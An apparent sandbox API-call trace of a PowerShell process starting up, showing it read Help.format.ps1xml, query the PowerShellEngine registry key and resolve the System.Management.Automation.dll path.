	[0445.767] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0445.767] GetFileType (hFile=0x2fc) returned 0x1
	[0445.767] SetErrorMode (uMode=0x1) returned 0x1
	[0445.767] GetFileType (hFile=0x2fc) returned 0x1
	[0445.767] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.768] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.769] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.769] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.770] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.770] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.770] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.770] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.771] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.771] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.771] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.772] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.772] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.772] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.772] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.772] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.775] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.775] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.776] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.776] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.776] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.776] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.776] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.777] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.777] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.777] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.777] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.777] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.778] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.778] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.778] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.778] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.780] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.781] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.781] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.781] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.781] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.781] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.782] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.782] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.782] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.782] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.782] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.782] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.783] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.783] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.783] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.783] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.783] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.783] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.783] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.784] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.784] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.784] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.784] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.784] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.784] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.784] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.785] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.785] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.785] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.785] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.785] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0xf37, lpOverlapped=0x0) returned 1
	[0445.785] ReadFile (in: hFile=0x2fc, lpBuffer=0x36552a7, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x36552a7*, lpNumberOfBytesRead=0x12d2d8*=0x0, lpOverlapped=0x0) returned 1
	[0445.785] ReadFile (in: hFile=0x2fc, lpBuffer=0x3655c08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3655c08*, lpNumberOfBytesRead=0x12d2d8*=0x0, lpOverlapped=0x0) returned 1
	[0445.786] CloseHandle (hObject=0x2fc) returned 1
	[0445.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0445.786] SetErrorMode (uMode=0x1) returned 0x1
	[0445.786] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d280 | out: lpFileInformation=0x12d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0445.786] SetErrorMode (uMode=0x1) returned 0x1
	[0445.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0445.786] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d368 | out: phkResult=0x12d368*=0x2fc) returned 0x0
	[0445.786] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2ec, lpData=0x0, lpcbData=0x12d2e8*=0x0 | out: lpType=0x12d2ec*=0x1, lpData=0x0, lpcbData=0x12d2e8*=0x56) returned 0x0
	[0445.786] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d1ea0
	[0445.786] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2bc, lpData=0x1b7d1ea0, lpcbData=0x12d2b8*=0x56 | out: lpType=0x12d2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d2b8*=0x56) returned 0x0
	[0445.786] CoTaskMemFree (pv=0x1b7d1ea0) 
	[0445.787] RegCloseKey (hKey=0x2fc) returned 0x0
	[0445.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0445.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0445.795] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x3f0da93b, Data2=0x9eb6, Data3=0x4b8d, Data4=([0]=0x84, [1]=0x44, [2]=0x4d, [3]=0x1, [4]=0x2b, [5]=0xc0, [6]=0x5e, [7]=0x56))) returned 0x0
	[0445.796] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x4244c77f, Data2=0xe701, Data3=0x4967, Data4=([0]=0xa8, [1]=0x6e, [2]=0x80, [3]=0xcd, [4]=0x9f, [5]=0x14, [6]=0x6a, [7]=0xb1))) returned 0x0
	[0445.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.847] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xc5157de0, Data2=0xa205, Data3=0x4a79, Data4=([0]=0x95, [1]=0x4c, [2]=0xce, [3]=0x49, [4]=0xe5, [5]=0x27, [6]=0x15, [7]=0x58))) returned 0x0
	[0445.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
